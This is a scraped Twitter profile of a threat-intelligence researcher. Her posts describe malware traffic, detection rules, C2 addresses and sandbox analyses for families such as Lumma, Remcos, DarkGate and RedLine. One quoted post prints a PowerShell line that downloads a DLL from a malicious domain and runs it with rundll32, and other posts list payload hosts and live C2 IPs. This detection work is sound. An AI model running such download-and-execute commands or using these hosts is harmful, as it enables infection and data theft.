Jane @Jane_0sint Twitter profile

Last Seen Profiles

@mikefeigin

@alphagooses

@ChannelWidth

@ACorke49534

@_NicolasTarek_

@_AmMarie

@titsmouse

@bk122LR

@colton0921

@A_ALAZMI8

@Stanley4Pres

@817ET_9603

@bokeplokalmalam

@huutrong69

@baengchan_good

@nagmh53

@Kainaat870

@TamaMiraiMesse

@FreeSyrianMemes

@LaMaisonGaga_

@neonprayersx

@zinidg

@jandakembangstw

@Dan_Pearce_Art

@blackfemphotogs

@LiTiebackheel

@SMTVIR

@kasintaaa15

@TheTownhouseODs

@AnnaharNews2020

@lsq1277636

@Saint_Sammie7

@Desi62650815829

@evilinmoonlight

@skk_ygr

@fcofcomarin

Jane

@Jane_0sint

11 months

#Phishing 🔖Regular expression to identify suspicious domain names

9

46

231

Jane

@Jane_0sint

1 year

Friends👋While we are celebrating our seventh anniversary, Win 7/8/10/11 x64 is available to everyone without a subscription!🎉Have a good hunting!😼

10

26

176

Jane

@Jane_0sint

1 year

#AgentTesla binary file inside Jpeg image -> retrieved by PS.Loader script⏬

2

38

106

Jane

@Jane_0sint

9 months

👩‍🍳 And again, a delicious recipe from me personally! 😋 Bon appetit my friends!

ANY.RUN

@anyrun_app

9 months

📌 Another malware campaign employs images with #stego Let's take a look at this sample ➡️ The #malware employs #steganography in several stages: 1️⃣ The modified "Google Update" app downloads multiple PE files and an image containing a DLL 2️⃣TrueUpdate,

0

42

110

0

21

102

Jane

@Jane_0sint

1 year

Stealer unknown to me👩‍💻 🐧Kowalski, analysis! - Objects extremely greedy! 77.105.147[.]140:15666 (TCP)

6

20

83

Jane

@Jane_0sint

1 year

UnkStealer🤷‍♀️ There is TitanStealer activity on these addresses, but the traffic structure and so on is very different from it. And the port is not 5000. 94.142.138[.]139 77.91.77[.]35 94.142.138[.]145 94.142.138[.]10 Ports: 5001/5005 Any ideas?

4

20

68

Jane

@Jane_0sint

1 year

🧙‍♀️How do I use the magic spell number 8000167 to find samples exfiltrating data via Telegram✨ 👩‍💻Works on all plans for all subscribers @anyrun_app 1 - Go to Filter🔍 2 - Type SID (8000167)⌨️ 3 - Get a list of samples📜 💡Hunting rules sids can also be taken from @ET_Labs

6

19

64

Jane

@Jane_0sint

10 months

🤹‍♀️My way to process a QR code is to pass the link via the clipboard and all in one task⤵️

ANY.RUN

@anyrun_app

10 months

Here’s how you can analyze a phishing link hidden inside a QR code: 1. Open the Static discovering window in ANYRUN 2. Click on the QR icon 3. Submit the link for analysis 4. Launch the task Here’s a sample you can use 👉

0

9

1

11

61

Jane

@Jane_0sint

1 year

Gurcu Stealer 💸 Sending a wsr report using the PUT method to an ip address.

4

13

61

Jane

@Jane_0sint

1 year

🧙‍♀️Did you know that network rules from contain some magic?✨For example, Telegram exfiltration is now not a simple certificate detection🔏Adding a little potion, allowed the spell with the number 8000167 to work with TLS packets🪄I hope you like my magic💫

4

14

59

Jane

@Jane_0sint

1 year

PikaBot ♠️ DLL Loader 📲 URI CrazyPCRE 😝 Pattern Checker ~98% Checked on GitHub IOC`s + Sandboxes

proxylife

@pr0xylife

1 year

#Pikabot - #Qakbot - BB19 - .html > url > .js > .ps > .dll wscript.exe LL.js $Mag = ( https://hanika-inc.]com/mjnPR9/uo) foreach ($washman in $Mag) {try {Invoke-WebRequest $washman -O $env:TEMP\Sulfuryl.dll rundll32 $env:TEMP\Sulfuryl.dll,LS88 IOC's

2

37

76

0

21

57

Jane

@Jane_0sint

1 year

RedLine 📈Stealer 🦝 News ⌨️ A combination of changes in MC-NMF protocol values that does not allow detection by network rules. Capturing a second authorization packet (green 218b) would be nice.

11

14

54

Jane

@Jane_0sint

1 year

STEALER [] PennyWise [sid:8000014] Recent sample activity🗓️ 🤡 🙀

0

18

56

Jane

@Jane_0sint

1 year

ObserverStealer 🦝 Seek and destroy🎸

1

7

55

Jane

@Jane_0sint

1 year

Havoc is a modern and malleable post-exploitation command and control framework. - SSL - MITM

1

17

53

Jane

@Jane_0sint

9 months

🚪Backdoor [RU] tekst 🐻 Js Stager ↔️ RegRead/RegWrite ↔️ Base64(PS script) 🛠️Uses the Windows registry as storage

5

20

53

Jane

@Jane_0sint

9 months

LOADER [] DarkGate Suspicious DNS TXT response Thank you!

Analysis Passport20231023_90223.pdf.lnk (MD5: C97607E6E04DA0E5EF7414821AFBA0F5) Malicious activity...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

Unit 42

@Unit42_Intel

9 months

2023-12-07 (Thursday) - PDF file found on VirusTotal led to #DarkGate infection - Windows shortcut retrieved DarkGate install script from DNS TXT record - activity may have started as early as 2023-11-27 - IOCs available at #TimelyThreatIntel #Wireshark

3

86

276

0

9

51

Jane

@Jane_0sint

1 year

SHELLCODE [] ShellCodeLoader (Gh0stCringe) 3076 bytes - > - pe exe -> Gh0st

0

14

51

Jane

@Jane_0sint

9 months

📂OpenSMB share \\89.23.98.22\LN\ POLICY [] Query an Executable file via SMB2 from an external server

匚ㄚ乃乇尺ㄖᐯ乇尺ㄥㄖ卂ᗪ

@Cyber0verload

10 months

#POVERTYSTEALER #GOVUA #VBS #SSU DOC: d12934-0202334.doc MD5: eac138b49c6f90896c9af5cbc8fe38b8 DNS: npddocs[.]com IP: 194[.]31.109.82 RTI: hxxps://npddocs[.]com/ssu.gov.ua/docs/file/util/0/d12934-0202334[.]doc Next-Stage: \\89.23.98[.]22\LN\Konstantin.exe @500mk500

2

9

23

2

10

48

Jane

@Jane_0sint

1 year

⚡️Update STEALER [] Win32/ #Stealc 💥Fully detonated sample ->

2

19

48

Jane

@Jane_0sint

1 year

STEALER [] PovertyStealer -> ETopen More samples by link⏫⏫⏫ And also by tag⏬⏬⏬ #PovertyStealer #stealer #malware

1

17

43

Jane

@Jane_0sint

1 year

💀SheetRat 💀 Packet for detection -> Dword(Len(Ping))+Gzip(Ping)

0

11

44

Jane

@Jane_0sint

1 year

👁️ ObserverStealer 👁️ Unmasking the New Contender in Cyber Crime Reported by @cyberhust1er 💻

3

8

43

Jane

@Jane_0sint

8 months

🫦The elaboration of #DarkGate is impressive (again;) 💵There is a focus on more expensive assets (RDP, LSASS), which is why the rental price is so high. 🕵️‍♀️Now DNS traffic and standard ports. 👋Of course, this is no longer the 2351 port on which I found 223 public tasks

ANY.RUN

@anyrun_app

8 months

📌 DarkGate: new script delivery action via DNS #DarkGate v5, a multifunctional #loader , now has advanced modules, allowing it to gain the initial access to organizations' infrastructure inside the perimeter, potentially expanding the scope of its victims. ⚙ Its initiation

1

46

123

1

14

44

Jane

@Jane_0sint

1 year

🎧Collection of musical payloads🎧 #opendir Player in the sandbox💿 http://5.42.66[.]3/fabric/

2

12

42

Jane

@Jane_0sint

11 months

Based on a regular expression, I wrote a rule to detect similar suspicious domains. 🆕PHISHING [] Generic Phishing domain observed in TLS SNI 💡Use the filter to search by rule number [sid:8001050] 🫶Good luck!

Jane

@Jane_0sint

11 months

#Phishing 🔖Regular expression to identify suspicious domain names

9

46

231

2

11

40

Jane

@Jane_0sint

1 year

Another sample was found based on a comparison of bigrams and autocorrelations of server responses from traffic. The backdoor was previously described by @xme in the blog <- (online)

3

15

41

Jane

@Jane_0sint

3 years

[BACKDOOR] TinyNuke [VNC] 💥 VNC Socket Magic word - "MELTED" C:\Users\Demone\Desktop\HVNC-main\_bin\Release\Win32\Client.pdb 👿 👩‍🚒

1

13

38

Jane

@Jane_0sint

2 years

#Botnet #Orchard 🥭🍑🍎🍒 The first packet is 4 bytes long.

1

6

38

Jane

@Jane_0sint

1 year

An example of a really reliable JA3 hash, which very rarely falsely works due to a very strange set of clienthello fields, and if you also add a !443 port, as is often the case with #Remcos , it detects very well✨

ANY.RUN

@anyrun_app

1 year

#Remcos version 3.x primarily focuses on TLS communication Let's take a closer look at its JA3 hash. The combination of ClientHello fields is shown in the attached images. When calculated in decimal values, it amounts to: 771,4865,51-43-13-10,25-24-23-21-19-16, And if hashed

0

10

23

1

10

39

Jane

@Jane_0sint

3 years

[STEALER] Collector ♻ FYI @ET_Labs let's compare the http headers of these two examples. The first (earlier) is matched by rule number 2841213 (Babulya Stealer) The second (later) one is matched by rule number 2843697 (Spy.Agent.PYU)

1

8

32

Jane

@Jane_0sint

1 year

🤲I will share another find of a stealer written in Go😼 🤷‍♀️And as always, your attribution versions are welcome! HTTP traffic is slightly described, partially decoded in the screenshot.

2

17

37

Jane

@Jane_0sint

3 years

[STEALER] Loki

0

11

37

Jane

@Jane_0sint

1 year

#Rootteam Stealer and a future version of Windows👾 🕵️‍♀️Look in User-Agent : Windows NT 123.9⚡️ Now covered by the rules🔧 Just in case, I made a rule for JSON, if the version continues to grow😅

1

15

37

Jane

@Jane_0sint

11 months

#Lumma #LummaC2 #LummaStealer 🆕STEALER [] Win32/Lumma Stealer Check-In 🆕STEALER [] Win32/Lumma Stealer Exfiltration @g0njxa 🤍 @AnFam17

1

7

35

Jane

@Jane_0sint

8 months

*ੈ✩‧₊ 🐸 - Bot 🤝 ♠️- Bot ✩‧₊˚ Now I have an excellent reason to remember what JARM is 🥳 ⚠️There are some regular expressions in the post, but beware of false positives! Guys, thank you very much for the inspiration! @embee_research @g0njxa

GitHub - salesforce/jarm

Contribute to salesforce/jarm development by creating an account on GitHub.

github.com

ANY.RUN

@anyrun_app

8 months

📌 Comparison of QakBot and PikaBot servers configuration #QakBot is a malware loader and initial access tool. It was active until August and suddenly appeared in mid-December 2023. #PikaBot malware has a modular structure including a loader and a core with a Shell backdoor,

0

58

158

0

21

51

Jane

@Jane_0sint

1 year

⚙️Here is another implementation of decrypting a 200-byte packet from the server. ⚡️If anyone did not know, the @ #Cyberchef has an option with storage in registers. 🔍look in the flow control section

ANY.RUN

@anyrun_app

1 year

#Tofsee is a veteran botnet that is still in service Tofsee utilizes a one-byte encryption algorithm using a slightly modified Output Feedback (OFB) scheme with plaintext feedback. This algorithm is used for the first packet from the server, which contains key information for

1

10

28

1

10

34

Jane

@Jane_0sint

1 year

clipper-socket 94.142.138.119:45245 DDR: UserAgent: mfo4engo2m

2

12

33

Jane

@Jane_0sint

3 years

[PAYLOAD] Encoded PE EXE or DLL Windows file 🗄 Binary variant. Obfuscating files by converting to strings of zeros and ones. MZ => 0️⃣1️⃣0️⃣0️⃣1️⃣1️⃣0️⃣1️⃣ 0️⃣1️⃣0️⃣1️⃣1️⃣0️⃣1️⃣0️⃣ 🧛‍♀️

1

8

31

Jane

@Jane_0sint

11 months

🖊️Signed BANKER [] Win32/Metamorfo CnC Checkin

JAMESWT

@JAMESWT_MHT

11 months

#Spy #Ousaban / #metamorfo H/T @abuse_ch Samples Urls Run cc @dodo_sec @obfusor @johnk3r

1

9

19

0

9

33

Jane

@Jane_0sint

3 years

[REMOTE] Remcos.RAT 🐙 Example of a custom protocol containing plaintext. Usually TCP packets are encrypted with RC4🔐 Newer versions can already accept TLS🔑 === Yellow - Magic + Size Red - Command Aquamarine - Delimiter === 🧛‍♀️🍷

Jane

@Jane_0sint

3 years

[REMOTE] Remcos v.3.2 TLS 1.3 (Client Hello static bytes) Suricata`s rule fragment: stream_size: client, =, 161; content: "|1603 0300 9b01 0000 9703 03|"; depth: 11; content: "|0000 0213 0101 0000 6c00 3300 4700 4500 1700 4104|"; distance: 32; within: 20;

0

1

16

1

4

29

Jane

@Jane_0sint

11 months

APT34 Deploys Phishing Attack With New Malware Sample -> with traffic🚗 🤌

Analysis MyCV.doc (MD5: 64F8DFD92EB972483FEAF3137EC06D3C) Malicious activity - Interactive analysis...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

Jane

@Jane_0sint

1 year

🕎 Menorah 🕎

0

3

9

2

18

33

Jane

@Jane_0sint

3 years

[STEALER] Vidar ⚔ (modified) Old(black) and New(gray) Server Response📤 Change grabber module -> Archive structure 📩 GET /freebl3.dll, mozglue.dll, msvcp140.dll, nss3.dll, softokn3.dll, vcruntime140.dll 💅

0

9

33

Jane

@Jane_0sint

1 year

HZRat ⚡️ Activity Report: Samples: 🟩 IOC: 47.100.65.182 🟩 113.125.92.32 111.203.161.31

0

13

32

Jane

@Jane_0sint

1 year

⭐️ RisePro Stealer v0.1 (TCP) ⭐️ "Old, but not obsolete"🦾🤖 ... and v.1.0(HTTP) traffic for comparison v0.1 -> 🐍 194.169.175.128:50500 v1.0 -> 🪱 108.174.199.249:80 Decoder:

0

3

30

Jane

@Jane_0sint

3 years

[STEALER] Vertex (New) HTTP GET <http_method "GET" with http_client_body, UA and HTTP Headers>🙄

2

4

31

Jane

@Jane_0sint

1 year

#Cyberchef is extremely handy for creating not so simple decoders. ⚙️Check out my new decoder for the #Lumma configuration received from C2. Only the recipe🔽 📡It's enough just to add the base64 data from the C2 connection to the input field.

ANY.RUN

@anyrun_app

1 year

The #LummaStealer malware can receive a configuration from the C&C server. The configuration is encrypted with a 32-byte XOR key, then encoded in Base64, and provided on request at the /c2conf URI. Here is a #Lumma sample: Use our #CyberChef recipe to

0

26

77

0

8

30

Jane

@Jane_0sint

1 year

🔐Сrypt🤖Bot There could be quite a lot of text here, but the most paradoxical evidence is noted in the photo 📸 Search by #cryptbot tag 🔍-> file[] - is waiting for rule📯)) DGA reminded me of one sample that I called \$CREEN ->

1

6

28

Jane

@Jane_0sint

1 year

A simple and rarely seen example of extracting data stolen by a #lokibot , not that it's a big deal, but it might come in handy for someone💁‍♀️

ANY.RUN

@anyrun_app

1 year

#LokiBot is one of the most enduring credential stealers. On ANYRUN, the first tag for LokiBot was applied on March 6, 2018, making it one of the first public submissions. 🟥 - The aPLib compression algorithm is used to compress the decoded exfiltrated data and credentials from

0

10

21

0

13

31

Jane

@Jane_0sint

10 months

#Sidewinder #apt [+] Network Traffic link: SHA-256: fa86b5bc5343ca92c235304b8dcbcf4188c6be7d4621c625564bebd5326ed850 Duser.dll rekeywiz.exe

2

13

30

Jane

@Jane_0sint

11 months

👩‍🍳Also check out my new cyberchef recipe:

ANY.RUN

@anyrun_app

11 months

📌The 'Eternity Project' encompasses #malicious software distributed via a #MaaS (Malware-as-a-Service) model. 🕵️‍♀️ Let's examine the network traffic generated by #Ethernity #Clipper to understand its protocol and behaviors. This malicious software is designed to replace the

0

7

25

1

9

29

Jane

@Jane_0sint

1 year

Infected RMSRemoteAdmin🤦‍♀️Protection through insult 😆 ETPRO Win32/RA-based.NLR (edit required) Drops XOR-ed 0x0A MSI container⏏️ http://82.117.253[.]5/next/ http://172.86.123[.]220/api/ to be continued...

2

13

28

Jane

@Jane_0sint

3 years

[SPYWARE] #Hancitor HTTP POST features <variables + separator for user and computer name>

0

7

24

Jane

@Jane_0sint

3 years

[STEALER] RedLine FYI🌸 RedLine uses MC-NMF protocol. Parsing handshake(in imgs). Payload is located in the Via Record section. <Version Record + Mode Record + Via Record + Known Encoding Record> 🌸to be continued...

0

9

28

Jane

@Jane_0sint

11 months

👺ABANTES [ Ransomware / Locker ]

2

10

28

Jane

@Jane_0sint

10 months

☕️ Caffeine 🐭 Mickey 🎣 Phishing

2

1

27

Jane

@Jane_0sint

1 year

This malware reuses some traffic elements of the family, but there are some differences ⚖️

Analysis http://89.23.96.203/dashboard/1/SCREEN.exe Malicious activity - Interactive analysis...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

ANY.RUN

@anyrun_app

1 year

How do we detect #Arkei Stealer in traffic The configuration received from the server contains: 🟩 - Token 🟥 - Target application switches and a profile (migrated from #Vidar ) 🟪 - Values from multipart data as indicators of exfiltration via HTTP POST (different from Vidar)

1

4

9

0

5

28

Jane

@Jane_0sint

3 years

[STEALER] Hancitor 🕵️‍♂️ The encoded version contains the same variables as in the previously detected samples🧷 The request to identify the external IP address was also preserved untouched👈 Let's tweak our rules! 🔧 @ET_Labs ✍👧👍

1

7

27

Jane

@Jane_0sint

3 years

[REMOTE] #MysterySnail 🐌 Initial TCP Payload Structure (Example) <Size + Session ID + Command ID> Have a good hunting! 👀

0

7

27

Jane

@Jane_0sint

3 years

[RANSOMWARE] Philadelphia🏘 HTTP Check-In features✅ 🤑👩‍⚖️☹

2

8

22

Jane

@Jane_0sint

1 year

🎯Track external SMB traffic according to the rule number 8000547 💻Do as I do in the screenshot and see the results. 💡Hint, in most cases it will be Storm-0978 CVE-2023-36884

0

8

27

Jane

@Jane_0sint

10 months

⚠️“Caffeine” Phishing Service Domains Now tagged as Caffeine by MRxC0DER details in the article -> 🔍Previous @anyrun_app submissions are filtered by rule number [8001156] 📌There is a suspicious substring: LOG - on the login entry form and PAS - on the

2

7

24

Jane

@Jane_0sint

1 year

GoodMorning 💸 Ransomware ⚡️ Not sure about stolen🤔

2

5

26

Jane

@Jane_0sint

1 year

⚡️Now covered in rules BACKDOOR [] #JanelaRAT BX RAT -⚙️-> JanelaRAT "With an adaptive approach utilizing dynamic socket configuration and exploiting DLL side-loading from trusted sources, JanelaRAT poses a significant threat."(c)⏬

Analysis Fac12285GasolineiraGrebjeelkjeBUWCobroGrebjeelkjeBUWnopago12285GrebjeelkjeBUW10303.zip...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

Zscaler

@zscaler

1 year

Explore the depths of cyber intrigue with our latest ThreatLabz blog on the emerging JanelaRAT variant. In it, we unveil its tactics for targeting LATAM’s financial sector, its cunning use of dynamic C2 infrastructure, and more. Read here:

0

2

18

0

9

26

Jane

@Jane_0sint

3 years

[STEALER] Snake Keylogger 🐍 Exfiltration passwords by email📧 Suspicious subject and decoded attachment message 📎 👩‍🔧

1

7

23

Jane

@Jane_0sint

11 months

↩️Redirecting via www[.bing.]com/ck/ to spear phishing by adding a direct link ➡️ to a suspicious myisp[.]cc which ends up redirecting ➡️to the login page✅

0

11

25

Jane

@Jane_0sint

1 year

🔊DynamicRAT⚡️ Thanks a lot for the report!!! Once I tortured him in the sandbox for 800 seconds 🕓 and saw reactions on the network to my activity⌨️😅🖱️ ⬇️Here are some links⬇️

Analysis My2021-22-W2-1040-1099-R.PDF.jar (MD5: 04BACA1B1BA093A27F498CEE89C4378C) Malicious...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

Gi7w0rm

@Gi7w0rm

1 year

New #BlogPost : It seems @tosscoinwitcher and I have discovered a previously undocumented #Java -based #RAT . Dupped #DynamicRAT , the #malware has a vast array of features. Read all about it the discovery process here: #CyberSecurity #infosec #networktamper

11

50

163

2

6

23

Jane

@Jane_0sint

3 years

[STEALER] RedF0xx (New)🦊 == Nitro.Gen.Stealer == Full header order matching + hardcoded boundary elements "--8d9"🔩 URN, zip file name format and file names inside the archive are different🔧 🦸‍♀️

Jane

@Jane_0sint

3 years

[STEALER] Nitro HTTP Post Request Header🧸 🤦‍♀️Odd number of characters in a boundary HEX string. 🔒Static bytes in the boundary "8d9" 🎀

1

8

22

0

9

24

Jane

@Jane_0sint

10 months

📜This story is about how I used those guys' non-working SQL server to get to the UBoat source code🔤 🤭Although you can just search on Github) lol 💁‍♀️But I didn’t know what it was then⁉️ 🧙‍♀️The moral is: Error tracing is sometimes useful💋

ANY.RUN

@anyrun_app

10 months

📌 UBoat - HTTP Botnet Project Communicates with the C2 server through HTTP requests that contain victim information in the URI: Receives payload download responses. For example, #LucaStealer ➡️ To gather additional evidence, let's delve into the error

0

16

56

0

9

23

Jane

@Jane_0sint

10 months

🧻Skoch Grabber 🤭 This code uses Blank Grabber as the template.

2

12

23

Jane

@Jane_0sint

1 year

STEALER [] Luca stealer Sid: 8000581 8000582

Who said what

@g0njxa

1 year

An unkown #stealer has been spotted on YT! C2 ⚙️ http://146.71.81.144/ Cookie Stealer, File Grabber, Crypto wallets, Password managers and Screenshoots, everything POST to C2 Take a look!👇👇 Just uploaded to VT

3

12

38

0

5

22

Jane

@Jane_0sint

3 years

[RANSOMWARE] HiddenTear.Gen 😢 HTTP headers and Ransom Note🔪 The ransomware note is very similar to ✨

Petrovic

@petrovic082

3 years

#Ransomware .payme background

2

1

7

1

10

22

Jane

@Jane_0sint

1 year

✨Found an interesting backdoor for you. Thanks to the virus analysts at for the detailed report✨

ANY.RUN - Interactive Online Malware Sandbox

Cloud-based malware analysis service. Take your information security to the next level. Analyze suspicious and malicious activities using our innovative tools.

any.run

ANY.RUN

@anyrun_app

1 year

🔍 New on our blog: #Gh0stBins RAT analysis. Gain insight into the rising #cyberthreat from China: 🇨🇳 🔹 Learn about its communication protocol 🔹 Check RDP stream recovery 🔹 Python scripts, YARA, and Suricata rules Check #malware analysis 👇

0

13

39

3

2

22

Jane

@Jane_0sint

11 months

👾 #lu0bot DNS pattern matching regular expression🔧 📖Details in the article⏬

ANY.RUN

@anyrun_app

11 months

Check out the #Lu0Bot malware analysis from ANYRUN! We cover the code overview, explain the deobfuscation process, YARA and Suricata rules, and show what sets this Node.js threat apart. ⬇️

1

26

60

0

5

24

Jane

@Jane_0sint

1 year

🤔"Poverty is the parent of crime." - Aristotle. C2 server returns a string with the command and address: givemedepspls #146 .70.104.234 After that, the client forms a packet with service information and zip.

5

3

24

Jane

@Jane_0sint

9 months

💁‍♀️How do you like this stealer? 😵‍💫Who came up with the idea of calling folders that way? \Temp\YUOhtyugjKgdfgjFGghj676jj\ 🌩️It looks like the author was electrocuted while typing! 💡Let's come up with a name for it, I propose to call it ⚡️Electrocuted

Analysis d7598624bb95fce2283ed6f6b08e9577 (MD5: D7598624BB95FCE2283ED6F6B08E9577) Malicious...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

2

3

21

Jane

@Jane_0sint

3 years

[REMOTE] #HiveRAT 🐝 Encrypted and Decrypted Check-In 🔐 There is no point in relying on a password. This chest opens differently 🔮

0

7

20

Jane

@Jane_0sint

3 years

[STEALER] Nitro HTTP Post Request Header🧸 🤦‍♀️Odd number of characters in a boundary HEX string. 🔒Static bytes in the boundary "8d9" 🎀

1

8

22

Jane

@Jane_0sint

1 year

#Hydrochasma Fast Reverse Proxy (APT) 🧾 Outbound TCP Stream Analysis: 🟦 - Custom Header 🟥 - Proxied TLS traffic

1

10

22

Jane

@Jane_0sint

2 years

#bluefox #stealer in this article I wrote the network part in Russian. there is a bit of magic in writing rules.✨✨✨

1

4

23

Jane

@Jane_0sint

1 year

I propose to read more about the threat in the following report 📖 And also participate in the 30-day #Formbook marathon from @malware_traffic 🏃

Analysis of Xloader’s C2 Network Encryption | Zscaler

In this blog post, we perform a detailed analysis of Xloader’s C2 communications and the network infrastructure that hosts the malware.

www.zscaler.com

ANY.RUN

@anyrun_app

1 year

#FormBook network traffic Let's have a look at this #malware traffic and our focus will be the network exfiltration detection. Exfiltration requests are POSTs. The rules track the following: 🟩 - HTTP headers are custom and hard-coded 🟥 - Data is encrypted using RC-4 on SHA-1

0

2

8

0

12

23

Jane

@Jane_0sint

11 months

💻Working on improving new dark crystal detection

Analysis ccd934c7dd80e3c5281f6912e8e5923e.exe (MD5: CCD934C7DD80E3C5281F6912E8E5923E) Malicious...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

2

6

21

Jane

@Jane_0sint

3 years

[SPYWARE] AgentTesla😎 Features of SMTP exfiltration💌 Compare with FTP exfiltration🗃 🧞‍♀️

0

6

22

Jane

@Jane_0sint

1 year

📆August is coming to an end, like the whole summer 🏖️ This month I wrote 120 rules and that's fine😎 In the fall, there is usually a lot of interesting things in cybersecurity, which means we will make detections together with you🤝 Thanks for the researches!👍

ANY.RUN

@anyrun_app

1 year

📢 Catch up with ANYRUN updates in August - Config extractors for #Lu0Bot , #Strela and more #malware families - Added new and improved existing network rules - Contributed new rules to @EmergingThreats community Read more details in our blog 👇

1

7

12

0

4

22

Jane

@Jane_0sint

1 year

🐙 Win32/Remcos RAT Checkin 🐙 Fragment of a possible future rule: flow:established,to_server; content:"|BA 49 B2 3C 5E 7E 69 43 28 63 8E|"; startswith; content:"|39 84|"; distance:2; within:2; classtype:command-and-control; @ET_Labs 🙏

Analysis ONSCREENA2ADRE_21030208342965856881.exe (MD5: FCEE7ED5ECF26ED1D4287E41DF99BFBB) Malicious...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

1

5

20

Jane

@Jane_0sint

11 months

🐢... slowly approached the Shellcode C:\Users\Administrator\Desktop\\xe6\x96\xb0\xe8\xaf\xad\xe8\xa8\x80\shellcode\xe7\xac\xac\xe4\xba\x8c\xe4\xbb\xbd\code\Debug\code.pdb

Jane

@Jane_0sint

11 months

💡Online sandboxes are often focused on certain regions 🌐For me, Asia covers 🔍Recently I found there an interesting version of #Gh0st [ Easy Language and VMprotect ] 💚 - comp/uncomp size 💙 - magic bytes ❤️ - zlib message

1

6

19

0

6

20

Jane

@Jane_0sint

11 months

🆕REMOTE [] Win32/Gh0stRat Activity ❤️ - Buffer sizes for packet and inflated data 💚 - Magic 💜 - zlib deflated Check-in #CyberChef - >

0

3

20

Jane

@Jane_0sint

3 years

[STEALER`s LOADER] Win32:PWSX-gen😳 DL: sqlite.dll, sqlite.dat TCP: toa.mygametoa.[com TLS: bh.mygameagend.[com TLS: fg.mygameagend[.com IP Check: ip-api[.com Static Bytes (Yellow), Size (Red). If there is an attribution, you're welcome!😋

3

10

16

Jane

@Jane_0sint

1 year

⚡️Payload Encryption Update 🔍sid: 8000993 - use a filter! 💪You can find these threats⏬ #AgentTesla *⃣ #Quasar *⃣ 📂All of them are in opendir, here is the taglink. #⃣

0

6

17

Jane

@Jane_0sint

1 year

#Lumma Stealer now loads a 32-byte XOR encrypted configuration using the /c2conf URI🔐 🥚The Easter egg is to pass the key in the first bytes in the clear✨ 🫶Thanks to the guys from for the analysis on the link! ➡️

ET Labs

@ET_Labs

1 year

21 new OPEN, 24 new PRO (21 + 3) Lumma Stealer, Blackmoon, SocGholish Thanks @Jane_0sint

0

1

3

0

4

21

Jane

@Jane_0sint

3 years

Can you help me to attribute this? I see fake HTTP traffic: GET /favicon.ico HTTP/1.1 + data (to_server & to_client) Strange naming - svchosl.exe & winlogoc.exe (), data structure in which the server responded as a client😲

1

6

19

Jane

@Jane_0sint

1 year

📧 If you see the triggering of rule 8000065 ⚡️ This means that a TLS stream containing a message body of a certain length was found in the sequence of SMTP protocol packets 🔍 It's not just a mail protocol detector📧

0

7

19

Jane

@Jane_0sint

10 months

👩🏼‍🍳Complete your recipes with one more made with love especially for you🫶 🤔Follow the link to find out more about the rule : 2048558 - ET MALWARE [] DarkGate Check-In HTTP Header (POST)↘️

DarkGate

Hi, having decrypted and detonated this sample that was received at the first stage of delivery, I noticed some features of http that can be used for detection. For example, the same user agent,...

community.emergingthreats.net

ANY.RUN

@anyrun_app

10 months

📌 #DarkGate Loader downloads an encrypted payload 🔓Decrypt the payload using #CyberChef Follow the instructions: 1⃣ Take the DarkGate sample in ANYRUN ➡️ 2⃣ Download the received encrypted data marked by the rule: ☑️ PAYLOAD []

0

34

115

0

5

20

Jane

@Jane_0sint

1 year

✨New Spyware✨ Kill Switch is the pakistan.txt file. elinline[.]com cachecast001[.]com

7

6

20

Jane

@Jane_0sint

1 year

💡In addition to tags, you can also filter by rules with the following numbers: 2036955, 2036934, 2854151, 2854152. And also for hunting, use other numbers: 2036884, 2044301, 8000094, 2044305 Happy raccoon hunting🦝

ANY.RUN

@anyrun_app

1 year

#Raccoon stealer is still popular This #malware is known for stealing sensitive data from victims. Raccoon's scheme of work is similar to many others and consists of 3 main stages: 🟩 - Configuration 🟪 - Loading 🟦 - Exfiltration Read more 👉

0

7

0

6

18

Jane

@Jane_0sint

3 years

[REMOTE] XtremeRAT 🐭 Constants: Сonstant for new connection "myversion". In order not to rely on constants for detection it is better to use the server response.🎈 == IDS == stream_size: server, =, 4; dsize: 3; content: "|580d0a|";

0

6

18

Jane

@Jane_0sint

10 months

#Pegasus =+=+=+=+= #Ransomware No. The Pegasus doesn't make deals #Wiper =+=+=+=+= [JAR - encryptAes.class]

0

4

17

Jane

@Jane_0sint

11 months

💡Online sandboxes are often focused on certain regions 🌐For me, Asia covers 🔍Recently I found there an interesting version of #Gh0st [ Easy Language and VMprotect ] 💚 - comp/uncomp size 💙 - magic bytes ❤️ - zlib message

1

6

19

Jane

@Jane_0sint

3 years

[SPYWARE] QakBot SOCKS5 protocol is encapsulated in QakBot proxy protocol. Thx @malware_traffic & Technical analysis of the QakBot banking Trojan @securelist_ru <Type + Ver + SesID + Size> Hello packet static bytes (516)🌸

Unit 42

@Unit42_Intel

3 years

2021-10-07 (Thursday) - #Qakbot ( #Qbot ) infection with #CobaltStrike and #ANGRYPUPPY / #BloodHound reconnaissance activity - IOCs with link to malware/artifact samples (and link to more info about ANGRYPUPPY) available at:

3

63

151

1

7

18

Jane

@Jane_0sint

10 months

JPEG ⏭️ <<BASE64_START>> ⏭️ Payload

ANY.RUN

@anyrun_app

11 months

🕵️ A #stego campaign weaponizes images to drop malware An ongoing #phishing campaign is delivering payloads through images with embedded Base64-encoded MZ files. So far, we have observed the use of #AgentTesla , #Asyncrat , #Dtloader , #Remcos and #NjRAT being downloaded using

0

27

66

0

6

18